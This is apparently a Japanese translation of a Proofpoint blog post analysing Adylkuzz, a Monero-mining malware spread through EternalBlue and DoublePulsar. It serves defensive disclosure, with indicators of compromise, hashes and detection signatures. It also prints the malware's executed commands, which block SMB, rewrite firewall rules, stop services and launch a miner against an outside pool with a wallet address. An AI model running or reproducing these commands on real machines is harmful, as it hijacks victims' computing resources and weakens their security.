暗号通貨マイニングマルウェア「Adylkuzz」がEternalBlue/DoublePulsarを介して拡散中

概要

5月12日金曜日、攻撃者達は世界中の企業LAN及びワイヤレスネットワークにマルウェアを迅速に拡散させるために、EternalBlueエクスプロイトを使った大規模なランサムウェア攻撃を行いました。EternalBlueは元々、Shadow Brokersが4月14日に暴露したNSAハッキングツールに含まれていたものです。このエクスプロイトは、TCPの445番ポート上のMicrosoft Server Message Block (SMB) を使ってネットワーク上の脆弱なコンピュータを検索し、他のマシンに悪意を持った任意のペイロードを拡散させることができる脆弱性 (MS17-010) を利用しています。さらにこの攻撃は、DoublePulsarと呼ばれるNSAバックドアを使ってWannaCryランサムウェアをインストールすることも確認されました。

しかしProofpointは、それに続く週末に、同じくEternalBlueとDoublePulsarを使ってAdylkuzzという暗号通貨マイナー (Miner: 採掘者) をインストールしようとする非常に大規模な攻撃を観測しました。初期のデータを見る限り、この攻撃はWannaCryを使った攻撃よりも規模において勝っていたと考えられます。それは、この攻撃が多くのSMBネットワークをシャットダウンしたことで、同じ脆弱性を狙う他のマルウェア (WannaCryワームなど) の感染を妨害し、先週のWannaCryの拡散を抑止したと考えられるからです。

この攻撃に遭った場合、Windowsの共有リソースへのアクセスができなくなったり、PCまたはサーバーのパフォーマンスが低下したりするなどの症状が現れます。5月15日朝、いくつかの組織からWannaCryが原因と考えられるネットワークの不具合についてレポートがありましたが、ランサムウェアに特有の警告文が出ていないことから、Proofpointではこれらの問題はAdylkuzzによるものであると考えています。Adylkuzz攻撃はWannaCry攻撃よりも早い時期に始まっており、少なくとも5月2日、恐らくは4月24日に始まっています。そしてこの攻撃は今でも継続しており、WannaCryよりも地味ではありますが、大規模で潜在的には極めて危険です。

発見

ProofpointはWannaCry攻撃を研究する過程で、研究用のマシンの中にEternalBlueの攻撃に対して脆弱なものがあることに気づきました。当初WannaCryに感染していると考えていたのですが、このマシンは予想もしなかった、目立たないマルウェアに感染していたのです。それが、暗号通貨マイナーの「Adylkuzz」でした。何度かテストして同じ結果を得た後、そのマシンを公開Web上に20分ほど放置したところ、Adylkuzzマイニング (Mining:ここでは仮想通貨の採掘) ボットネットに登録されました。

EternalBlue/DoublePulsar attack from one of several identified hosts

図1: 特定された何台かのホストのうちのひとつからのEternalBlue/DoublePulsar攻撃の様子、その後、他のホストからAdylkuzzをダウンロード: このキャプチャ画像のpcapのハッシュはIOCテーブルにあります

攻撃は、TCPの445番ポートを大規模にスキャンして標的を探している数台の仮想プライベートサーバーから行われていました。

EternalBlueによる侵害が成功した後、マシンはDoublePulsarに感染します。そしてDoublePulsarバックドアが、他のホストからAdylkuzzをダウンロードして実行します。Adylkuzzが動作を開始すると、既に動いている自分のインスタンスがあればそれを停止し、SMB通信を遮断してそれ以上感染が起こらないようにします。その後、感染マシンの公開IPアドレスを検出し、C&C (Command and Control) サーバーからマイニング指示やCryptominer、クリーンアップツールなどをダウンロードします。

Cryptominerとマイニング指示を配信するAdylkuzzのC&Cサーバーは、常時複数台設置されていたことが確認されています。図2はこの攻撃においてAdylkuzzによって生成された感染後のトラフィックです。

Post-infection traffic associated with the attack

図2: 攻撃による感染後のトラフィック

この攻撃では、AdylkuzzはMonero暗号通貨のマイニングを行います。Moneroはビットコインに似ていますが、より匿名性が高められており、AlphaBay闇市場で使われるようになってから急速に使われるようになりました。AlphaBayは司法当局によると「ドラッグや盗まれたクレジットカード、模造品などを扱うことで有名な非合法Webサイト」ということです。他の暗号通貨と同様、Moneroもまた、マイニングによって通貨量を拡大します。マイニングプロセスには多量の計算リソースが必要で、その代わりにマイナーは報酬を得ます。その額は 7.58Moneroで、現在の交換レートでおよそ$205になります。

図3はAdylkuzzがMonero暗号通貨をマイニングしている様子です。ここに見られるように、プロセスはボットネットで配信でき、今では専門の高速なマシンを必要とするようになってしまったビットコインよりも簡単です。

Adylkuzz mining Monero cryptocurrency

図3: Adylkuzzに感染した仮想マシンの振る舞い解析の一部: SMBを遮断し、Moneroのマイニングを開始している

この攻撃に関連づけられたいくつかのMoneroアドレスのうちのひとつを図4に示します。Hash RateはMoneroをマイニングしているボットネットの相対的速度で、Total Paidはマイニング活動に対してこのアドレスに対して支払われた額です。この場合、このアドレスが活動を終えるまでに$22,000以上が支払われたことになります。

One of several Monero addresses associated with income from Adylkuzz mining

図4: Adylkuzzのマイニングに関連づけられたいくつかのMoneroアドレスのひとつ

あるAdylkuzzアドレスのマイニング報酬を見てみると、この攻撃が始まった4月24日以降に支払いが増えていることがわかります。5月11日に急減したのは、攻撃者がマイニングアドレスを新しいものに切り替えたからでは無いかと考えています。(図5) 常にアドレスを変えることで、ひとつのアドレスに多額のMoneroが支払われないようにしていると考えられます。

Daily payment activity associated with a single Adylkuzz mining address

図5: あるAdylkuzzマイニングアドレスの日次支払い額

もうひとつのアドレスのデータと支払いの履歴を図6に示します。このアドレスにはこれまでに$7,000以上が支払われています。

A second Monero address associated with income from Adylkuzz mining

図6: Adylkuzzマイニングに関連づけられたもうひとつのMoneroアドレス

三つ目のアドレスは高いHash Rateを持ち、これまでの支払総額は$14,000以上です。(図7)

A third Monero address associated with income from Adylkuzz mining

図7: Adylkuzzマイニングに関連づけられた三つ目のMoneroアドレス

私達は現在、スキャンと攻撃のためのホストを20以上特定しており、1ダース以上のAdylkuzz C&Cサーバーが稼働していると考えています。さらに、この攻撃に関連したMoneroマイニングアドレスとAdylkuzz C&Cサーバーはもっと多数に上ると考えられます。

結論

先週のWannaCry攻撃同様、今回の攻撃も漏洩したNSAハッキングツールを使い、Microsoft Windowsのネットワーク機能の脆弱性を利用しています。実際にはAdylkuzzはWannaCryに遙かに先行して始まっています。古いバージョンのWindowsを使っている、またはMicrosoftが先月リリースしたSMBパッチを適用していない組織は、この種の攻撃に対してPCやサーバーが未だに脆弱な状態にあります。攻撃がランサムウェアを含んでいるのか、暗号通貨マイナーを含んでいるのか、あるいは他のタイプのマルウェアを含んでいるかに関係なく、これらの攻撃は極めて危険で大きな被害をもたらす恐れがあります。二つの大規模な攻撃が、同じ攻撃ツールと脆弱性を利用しました。その他の攻撃がこれに続くことが予想されますので、組織や個人はこれらのパッチをできる限り速やかに適用する事をお薦めします。

謝辞

ご協力頂いた以下の方々に謝意を表します。

            連絡に対して迅速に行動してくれたCloudflareとChoopaの皆様

            いくつかのアドバイスをくれた@benkow_

Indicators of Compromise

Selection of Domain/IP Address Date Comment
45.32.52[.]8 2017-05-16 Attacking host
45.76.123[.]172 2017-05-16 Attacking host
104.238.185[.]251 2017-05-16 Attacking host
45.77.57[.]194 2017-05-14 Attacking host
45.76.39[.]29 2017-05-15 Attacking host
45.77.57[.]36 2017-05-15 Attacking host
104.238.150[.]145 2017-05-14 Server hosting the payload binary
08.super5566[.]com 2017-05-14 Adylkuzz C&C
a1.super5566[.]com 2017-05-02 Adylkuzz C&C
aa1.super5566[.]com 2017-05-01 Adylkuzz C&C
lll.super1024[.]com 2017-04-24 Adylkuzz C&C
07.super5566[.]com 2017-04-30 Adylkuzz C&C
am.super1024[.]com 2017-04-25 Adylkuzz C&C
05.microsoftcloudserver[.]com 2017-05-12 Adylkuzz C&C
d.disgogoweb[.]com 2017-04-30 Adylkuzz C&C
panel.minecoins18[.]com 2014-10-17 Adylkuzz C&C in 2014
wa.ssr[.]la 2017-04-28 Adylkuzz C&C
45.77.57[.]190 2017-05-15 Host presenting same signature as attackers
45.77.58[.]10 2017-05-15 Host presenting same signature as attackers
45.77.58[.]40 2017-05-15 Host presenting same signature as attackers
45.77.58[.]70 2017-05-15 Host presenting same signature as attackers
45.77.56[.]87 2017-05-15 Host presenting same signature as attackers
45.77.21[.]159 2017-05-15 Attacking Host
45.77.29[.]51 2017-05-15 Host presenting same signature as attackers
45.77.31[.]219 2017-05-15 Host presenting same signature as attackers
45.77.5[.]176 2017-05-15 Host presenting same signature as attackers
45.77.23[.]225 2017-05-15 Host presenting same signature as attackers
45.77.58[.]147 2017-05-15 Host presenting same signature as attackers
45.77.56[.]114 2017-05-15 Host presenting same signature as attackers
45.77.3[.]179 2017-05-15 Host presenting same signature as attackers
45.77.58[.]134 2017-05-15 Host presenting same signature as attackers
45.77.59[.]27 2017-05-15 Host presenting same signature as attackers

MISP JSON format フォーマットでも入手できます。

Select Dropped Samples

SHA-256 Date Comment
29d6f9f06fa780b7a56cae0aa888961b8bdc559500421f3bb3b97f3dd94797c2 2017-05-14 Pcap of the attack (filtered and a bit sanitized)
8200755cbedd6f15eecd8207eba534709a01957b172d7a051b9cc4769ddbf233 2017-05-14 Adylkuzz.B spread via EB/DP
450cb5593d2431d00455cabfecc4d28d42585789d84c25d25cdc5505189b4f9f 2017-04-24 Adylkuzz.A (we are not sure that instance was spread via EB/DP)
a7000b2618512f1cb24b51f4ae2f34d332b746183dfad6483aba04571ba8b2f9 2017-05-14 s2bk.1_.exe
e96681456d793368a6fccfa1321c10c593f3527d7cadb1ff462aa0359af61dee 2017-05-14 445.bat (? seems to cleanup old variant of the coin miner and stop windows Update)
e6680bf0d3b32583047e9304d1703c87878c7c82910fbe05efc8519d2ca2df71 2017-05-14 Msiexev.exe
Bitcoin miner process
55622d4a582ceed0d54b12eb40222bca9650cc67b39f74c5f4b78320a036af88 2017-05-02 Bitcoin miner process
6f74f7c01503913553b0a6118b0ea198c5a419be86fca4aaae275663806f68f3 2017-05-15 Adylkuzz.B spread via EB/DP
fab31a2d44e38e733e1002286e5df164509afe18149a8a2f527ec6dc5e71cb00 2014-10-17 An old version of Adylkuzz
d73c9230811f1075d5697679b6007f5c15a90177991e238c5adc3ed55ce04988 2017-05-15 Adylkuzz.B spread via EB/DP

Executed commands:

taskkill /f /im hdmanager.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
taskkill /f /im mmc.exe
sc stop WELM
sc delete WELM
netsh ipsec static add policy name=netbc
netsh ipsec static add filterlist name=block
netsh ipsec static add filteraction name=block action=block
netsh ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp description=445
netsh ipsec static add rule name=block policy=netbc filterlist=block filteraction=block
netsh ipsec static set policy name=netbc assign=y
C:\Windows\Fonts\wuauser.exe --server
C:\Windows\Fonts\msiexev.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 49v1V2suGMS8JyPEU5FTtJRTHQ9YmraW7Mf2btVCTxZuEB8EjjqQz3i8vECu7XCgvUfiW6NtSRewnHF5MNA3LbQTBQV3v9i -p x -t 1
C:\Windows\TEMP\\s2bk.1_.exe /stab C:\Windows\TEMP\\s2bk.2_.log
taskkill /f /im msiexev.exe
netsh advfirewall firewall delete rule name="Chrome"
netsh advfirewall firewall delete rule name="Windriver"
netsh advfirewall firewall add rule name="Chrome" dir=in program="C:\Program Files\Google\Chrome\Application\chrome.txt" action=allow
netsh advfirewall firewall add rule name="Windriver" dir=in program="C:\Program Files\Hardware Driver Management\windriver.exe" action=allow
C:\Windows\445.bat
C:\Windows\system32\PING.EXE ping 127.0.0.1
net stop Windows32_Update
attrib +s +a +r +h wuauser.exe
C:\Windows\system32\SecEdit.exe secedit /configure /db C:\Windows\netbios.sdb
C:\Windows\system32\net1 stop Windows32_Update

Select ET signatures

2024217 || ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray
2024218 || ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response
2024216 || ET EXPLOIT Possible DOUBLEPULSAR Beacon Response
2000419 || ET POLICY PE EXE or DLL Windows file download
2826160 || ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2017-04-28 1)
2017398 || ET POLICY Internal Host Retrieving External IP via icanhazip.com - Possible Infection
2022886 || ET POLICY Crypto Coin Miner Login

Subscribe to the Proofpoint Blog